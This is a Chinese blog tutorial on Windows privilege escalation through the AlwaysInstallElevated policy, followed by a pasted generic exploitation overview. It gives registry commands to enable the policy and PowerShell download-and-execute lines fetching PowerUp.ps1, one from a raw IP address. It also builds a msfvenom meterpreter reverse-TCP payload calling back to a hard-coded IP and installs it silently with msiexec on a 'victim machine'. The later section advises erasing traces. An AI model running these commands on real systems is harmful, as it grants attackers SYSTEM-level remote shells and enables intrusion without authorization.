Windows操作系统提权之系统服务漏洞提权Always Install Elevated

Always Install Elevated

1.形成原因

任意用户以NT AUTHORITY\SYSTEM权限安装 i。
AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非
特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以
system权限执行任意payload。
MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序

2.Always Install Elevated(判断是否激活Always Install Elevated)

在测试环境启用AlwaysInstallElevated,命令如下:

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

通过powerup判断

powershell -ep bypass iex(new-object
net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

 

powershell -ep bypass iex(new-object
net.webclient).downloadstring('http://150.158.137.72:8000/PowerUp.ps1');Get-
RegistryAlwaysInstallElevated

通过注册表判断

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启

通过修改注册表激活:

reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
Reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

3.提权准备 

2 msf生成exe程序
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=9090 LHOST=119.45.175.218 -f exe
>1.exe
3. 使用exemsi将exe封装为msi。
配置样式为下图所示,其他默认即可

4.提权流程 

上传test.msi到目标机器上

运行msi程序,得到system权限的shell。
受害者机器上执行:msiexec /quiet /qn /i 1.msi
### Windows 漏洞利用流程 在讨论如何通过漏洞实现升之前,需强调合法性和道德责任的重要性。未经授渗透测试或攻击行为违反法律并可能导致严重后果。 #### 收集目标信息 在执行任何操作前,必须先收集有关目标系统的详细信息。这一步骤通常涉及扫描开放端口、识别操作系统版本以及检测已安装的安全补丁级别。例如,在某些情况下,未修补的 CVE-2019-0708 可能表明存在远程代码执行风险[^3]。 #### 查找潜在漏洞 一旦获取了足够的背景数据,则可以开始寻找适用于特定环境中的已知漏洞。对于 Windows 平台而言,常见的类别包括但不限于内核模式驱动程序错误处理不当所引发的缓冲区溢出问题[^2] 或者像 CLFS 日志服务这样的组件中存在的设计缺陷[^4]。 #### 开发/选择合适的 exploit 当确认某个具体类型的弱点确实存在于待攻破机器之上之后 ,就需要着手构建或者选取相应的exploit脚本 。这些工具能够自动化地触发发现出来的安全隐患,并最终达成预期效果——即获得更高层次上的控制(如管理员级)。下面给出了一段伪代码用于说明概念: ```python def exploit_vulnerability(target_ip, payload): """ A hypothetical function to demonstrate the process of exploiting a vulnerability. Args: target_ip (str): The IP address of the target machine. payload (bytes): The malicious code or command to execute on success. Returns: bool: True if exploitation was successful, False otherwise. """ try: # Connect to the vulnerable service connection = establish_connection(target_ip) # Send specially crafted data to trigger the vulnerability send_payload(connection, payload) # Check whether elevated privileges have been obtained result = verify_privilege_escalation() return result except Exception as e: log_error(e) return False ``` 请注意上述仅为示意性质的功能框架图,并不构成实际可用的技术手段。 #### 验证成果与清理痕迹 最后阶段要做的工作便是检验整个过程是否达到了既定目的;与此同时也要考虑到后续可能面临的追踪调查情况,因此有必要采取措施消除活动期间留下的各种迹象以防万一。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知归期的迷途羔羊

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值